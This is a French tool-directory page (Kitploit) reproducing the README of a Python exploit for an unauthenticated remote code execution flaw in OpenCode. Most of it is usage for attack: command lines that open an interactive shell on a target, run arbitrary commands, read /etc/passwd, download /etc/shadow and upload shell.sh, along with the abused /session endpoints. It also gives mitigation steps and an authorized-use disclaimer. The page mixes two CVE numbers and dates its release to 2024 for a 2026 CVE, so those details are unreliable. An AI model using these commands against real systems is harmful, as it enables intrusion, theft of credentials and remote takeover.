Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-22812 — Outil d'exploitation Python pour OpenCode RCE (CVE-2026-22812) offrant l'exécution de commandes, la lecture/écriture/téléversement/téléchargement de fichiers, ainsi qu'un shell interactif pour les tests d'intrusion autorisés. | Kitploit
Outils/GitHubGitHub/0xgh057r3c0n/cve-2026-22812
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHub0xgh057r3c0n/cve-2026-22812

CVE-2026-22812

Outil d'exploitation Python pour OpenCode RCE (CVE-2026-22812) offrant l'exécution de commandes, la lecture/écriture/téléversement/téléchargement de fichiers, ainsi qu'un shell interactif pour les tests d'intrusion autorisés.

Voir le dépôt
21il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-22812

Vue d'ensemble

Un outil d'exploitation en Python pour la vulnérabilité d'exécution de code à distance (RCE) d'OpenCode affectant les versions < v1.0.216. Cet outil fournit plusieurs vecteurs d'attaque, notamment l'exécution de commandes, la lecture/écriture de fichiers, le téléversement/téléchargement de fichiers et un shell interactif.

Avertissement

⚠️ POUR TESTS AUTORISÉS UNIQUEMENT ⚠️

  • Cet outil est destiné uniquement aux tests de sécurité légitimes et aux tests d'intrusion autorisés
  • Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test
  • L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par cet outil
  • L'accès non autorisé à des systèmes informatiques est illégal et puni par la loi

Fonctionnalités

  • Détection de vulnérabilité : Vérifier si la cible est vulnérable
  • Exécution de commandes : Exécuter des commandes arbitraires sur la cible
  • Opérations sur les fichiers : Lire, écrire, téléverser et télécharger des fichiers
  • Shell interactif : Shell interactif complet avec complétion par tabulation
  • Reconnaissance système : Recueillir des informations sur le système
  • Support de proxy : Acheminer le trafic via un proxy HTTP
  • Suivi des statistiques : Surveiller les activités d'exploitation

Installation

root@kitploit:~
# Cloner le dépôt
git clone https://github.com/0xgh057r3c0n/CVE-2026-22812.git
cd CVE-2026-22812

# Installer les dépendances
pip install requests urllib3

# Rendre exécutable (optionnel)
chmod +x CVE-2026-22812.py

Prérequis

  • Python 3.6+
  • Bibliothèque requests
  • Bibliothèque urllib3

Utilisation

root@kitploit:~
python3 CVE-2026-22812.py -t http://cible:port [options]

Exemples de base

root@kitploit:~
# Vérifier si la cible est vulnérable
python3 exploit.py -t http://10.0.0.1:4096 --check

# Shell interactif
python3 exploit.py -t http://10.0.0.1:4096 -i

# Exécuter une commande unique
python3 exploit.py -t http://10.0.0.1:4096 -c "id"

# Lire un fichier
python3 exploit.py -t http://10.0.0.1:4096 -r /etc/passwd

# Téléverser un fichier
python3 exploit.py -t http://10.0.0.1:4096 --upload shell.sh /tmp/shell.sh

# Télécharger un fichier
python3 exploit.py -t http://10.0.0.1:4096 --download /etc/shadow shadow.txt

# Obtenir les informations système
python3 exploit.py -t http://10.0.0.1:4096 --info

# Utiliser un proxy (Burp Suite, etc.)
python3 exploit.py -t http://10.0.0.1:4096 -c "whoami" --proxy http://127.0.0.1:8080

Commandes du shell interactif

Une fois dans le shell interactif (option -i), vous pouvez utiliser :

root@kitploit:~
<commande>                   Exécuter une commande shell
help                       Afficher le menu d'aide
exit                       Quitter le shell
session                    Afficher l'ID de session
stats                      Afficher les statistiques d'exploitation
read <fichier>             Lire le contenu d'un fichier
download <distant> <local>  Télécharger un fichier
upload <local> <distant>    Téléverser un fichier
sysinfo                    Obtenir les informations système

Détails de la vulnérabilité

  • ID CVE : CVE-2026-22812 / CVE-2026-22182
  • Produit : OpenCode
  • Versions affectées : < v1.0.216
  • Type de vulnérabilité : Exécution de code à distance
  • Vecteur d'attaque : Réseau
  • Authentification : Non requise

Détails techniques

La vulnérabilité existe dans le point de terminaison de gestion de session (/session) qui permet aux utilisateurs non authentifiés de créer des sessions et d'exécuter des commandes arbitraires via le point de terminaison /session/{id}/shell.

Points de terminaison exploités :

  1. POST /session - Créer une session
  2. POST /session/{id}/shell - Exécuter des commandes
  3. GET /file/content - Lire des fichiers

Atténuation

  1. Mettre à niveau OpenCode vers la version ≥ v1.0.216
  2. Mettre en œuvre une authentification et une autorisation appropriées
  3. Restreindre l'accès réseau aux instances OpenCode
  4. Mettre en œuvre la validation et l'assainissement des entrées
  5. Utiliser un pare-feu d'application web (WAF)

Structure du code

root@kitploit:~
CVE-2026-22812.py
├── Classe Colors (codes de couleur ANSI)
├── print_banner() (Afficher la bannière)
├── Classe Exploit (Logique principale d'exploitation)
│   ├── __init__() (Initialisation)
│   ├── check_vuln() (Vérification de vulnérabilité)
│   ├── create_session() (Créer une session)
│   ├── exec_cmd() (Exécuter une commande)
│   ├── read_file() (Lire un fichier)
│   ├── write_file() (Écrire un fichier)
│   ├── upload() (Téléverser un fichier)
│   ├── download() (Télécharger un fichier)
│   ├── get_info() (Informations système)
│   ├── shell() (Shell interactif)
│   └── Méthodes auxiliaires
└── main() (Analyse des arguments)

Licence

Cet outil est publié à des fins éducatives uniquement. Utilisez-le à vos propres risques.

Auteur

  • GitHub : 0xgh057r3c0n
  • Outil : Outil d'exploitation CVE-2026-22812

Contribution

  1. Forker le dépôt
  2. Créer une branche de fonctionnalité
  3. Valider vos modifications
  4. Pousser vers la branche
  5. Créer une demande de tirage (Pull Request)

Remerciements

  • Les chercheurs en sécurité qui ont découvert la vulnérabilité
  • La communauté open source
  • Tous les contributeurs et testeurs

Références

  • Avis de sécurité OpenCode
  • Base de données CVE
  • Entrée NVD

Support

Pour les problèmes et questions, veuillez :

  1. Consulter les problèmes GitHub existants
  2. Créer un nouveau problème avec une description détaillée
  3. Inclure l'URL cible (si possible) et les messages d'erreur

Historique des versions

  • v1.0.0 (2024-01-20) : Version initiale
    • Détection de vulnérabilité
    • Exécution de commandes
    • Opérations sur les fichiers
    • Shell interactif
    • Support de proxy
Télécharger l’outil